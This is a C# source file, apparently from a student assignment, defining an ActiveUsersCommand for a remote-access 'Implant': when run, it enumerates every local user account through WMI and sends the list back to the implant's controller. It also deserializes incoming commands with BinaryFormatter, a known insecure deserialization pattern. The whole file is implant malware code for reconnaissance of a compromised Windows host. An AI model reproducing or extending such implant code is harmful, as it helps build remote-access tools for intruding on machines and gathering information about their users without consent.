using System;
using System.Collections.Generic;
using System.Text;
using System.Runtime.Serialization.Formatters.Binary;
using System.IO;
using System.Security.Principal;
using System.Management;
using assignmentObjects;

namespace assignmentObjects
{
    [Serializable]
    public class ActiveUsersCommand:Command
    {

        public override void execute()
        {
            Console.WriteLine("This is a List Active Users Command");
            ObjectQuery oqQuery = new ObjectQuery("Select * FROM Win32_UserAccount");
            ManagementObjectSearcher mosSearch = new ManagementObjectSearcher(oqQuery);
            List<String> theUsers = new List<String>();
            foreach (ManagementObject moInfo in mosSearch.Get())
            {
                String user = (string)moInfo.GetPropertyValue("name");
                theUsers.Add(user);
            }
            Implant theImplant = Implant.instance();
            theImplant.sendReply(new ActiveUsersReply(theUsers));
         
        }

        public override Command DeSerialize(byte[] theData)
        {
            BinaryFormatter bin = new BinaryFormatter();
            MemoryStream mem = new MemoryStream();
            mem.Write(theData, 0, theData.Length);
            mem.Seek(0, 0);
            return (ActiveUsersCommand)bin.Deserialize(mem);
        }
    }
    
}
